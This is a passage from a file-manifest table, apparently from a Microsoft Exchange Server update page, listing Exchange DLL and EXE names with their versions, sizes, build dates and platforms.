\nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.858.9| 20,872| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.858.9| 16,264| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.858.9| 49,040| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.858.9| 38,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.858.9| 10,375,064| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.858.9| 24,456| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.858.9| 89,496| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.858.9| 20,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.858.9| 26,512| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.858.9| 21,368| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.858.9| 28,040| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.858.9| 19,832| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.858.9| 16,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.858.9| 17,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.858.9| 52,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.858.9| 34,176| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.858.9| 18,832| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.858.9| 43,392| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.858.9| 165,256| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.858.9| 54,656| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.858.10| 9,055,616| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.858.9| 33,160| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.858.10| 124,304| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.858.10| 661,384| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.858.10| 63,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.858.10| 2,791,808| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.858.10| 151,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.858.10| 966,528| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.858.9| 31,616| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.858.10| 39,816| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.858.10| 105,856| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.858.10| 95,104| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.858.10| 172,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.858.10| 102,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.858.10| 188,824| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.858.9| 447,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.858.10| 89,992| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.858.10| 107,928| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.858.10| 371,088| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.858.10| 193,928| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.858.10| 552,320| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.858.9| 15,736| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.858.10| 321,416| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.858.10| 45,464| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.858.10| 18,296| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.858.9| 415,112| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.858.9| 1,269,648| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.858.10| 39,312| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.858.9| 433,528| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.858.10| 4,566,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.858.9| 261,000| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.858.9| 33,672| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.858.9| 94,096| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.858.10| 586,136| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.858.9| 3,543,424| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.858.10| 67,992| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.dll| 15.2.858.10| 16,496,008| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.858.10| 58,776| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.858.10| 23,952| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.858.10| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.858.10| 543,624| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.858.10| 305,024| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.858.9| 273,800| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.858.10| 418,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.858.10| 275,856| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.858.10| 70,536| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.858.9| 7,873,944| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.858.10| 1,502,096| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.858.10| 71,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.858.10| 1,249,152| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.858.10| 1,876,872| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.858.9| 5,366,656| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.858.9| 117,624| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.858.10| 209,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.858.9| 79,744| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.858.10| 156,056| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.858.10| 65,944| 04-Apr-2021| 08:40| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.858.10| 58,248| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.858.10| 29,576| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.858.10| 175,512| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.858.10| 28,568| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.858.10| 75,144| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.858.10| 207,240| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.858.10| 440,712| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.858.10| 35,224| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.858.10| 96,656| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.migration.dll| 15.2.858.10| 1,110,424| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.858.9| 14,712| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.858.10| 135,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 5,065,600| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.858.9| 68,480| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.net.dll| 15.2.858.9| 5,086,104| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.858.9| 265,608| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.858.9| 14,200| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.858.10| 549,776| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.858.9| 22,920| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.858.10| 106,392| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.858.9| 291,736| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.858.9| 277,912| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.odata.dll| 15.2.858.10| 2,993,536| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.858.9| 90,496| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.858.9| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.858.9| 38,272| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.858.9| 45,456| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.858.9| 58,240| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.858.9| 147,336| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.858.9| 184,208| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.858.9| 55,688| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.858.9| 147,320| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.858.9| 191,880| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.858.9| 33,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.858.9| 28,040| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.858.10| 15,240| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.858.9| 42,888| 04-Apr-2021| 08:32| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.858.9| 358,280| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.858.10| 4,166,528| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.858.10| 308,632| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.858.10| 41,344| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.858.9| 30,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.858.9| 137,088| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.858.9| 441,736| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.858.10| 224,664| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.858.10| 105,864| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.pst.dll| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.858.9| 259,472| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.858.9| 72,072| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.858.9| 215,952| 04-Apr-2021| 08:37| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.858.9| 106,872| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.858.9| 425,856| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.858.9| 70,520| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.858.9| 215,944| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.query.core.dll| 15.2.858.10| 168,832| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.858.10| 343,424| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.858.10| 174,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.858.10| 95,112| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.858.10| 127,360| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.858.9| 63,368| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.858.10| 9,666,968| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.858.9| 20,788,120| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.858.9| 72,088| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.858.9| 13,184| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.858.9| 59,280| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpc.dll| 15.2.858.9| 1,647,496| 04-Apr-2021| 08:29| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.858.9| 209,816| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.858.9| 60,288| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.858.9| 518,024| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.858.9| 161,160| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.858.9| 724,360| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.858.9| 243,088| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:29| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.858.10| 35,216| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.858.10| 56,216| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.858.9| 27,544| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.858.10| 20,360| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.858.9| 267,672| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.858.9| 111,000| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.858.9| 112,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.858.9| 622,472| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.858.9| 12,168| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.858.9| 19,320| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.core.dll| 15.2.858.9| 211,864| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.858.10| 17,800| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.858.9| 436,616| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.search.files.dll| 15.2.858.10| 274,304| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.858.9| 24,968| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.858.9| 218,008| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.search.service.exe| 15.2.858.9| 26,520| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.858.9| 221,056| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.security.dll| 15.2.858.9| 1,559,960| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.858.9| 225,152| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.858.9| 5,151,120| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.858.9| 214,920| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.858.9| 115,576| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.858.9| 80,768| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.858.9| 81,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.858.9| 211,840| 04-Apr-2021| 08:31| x86 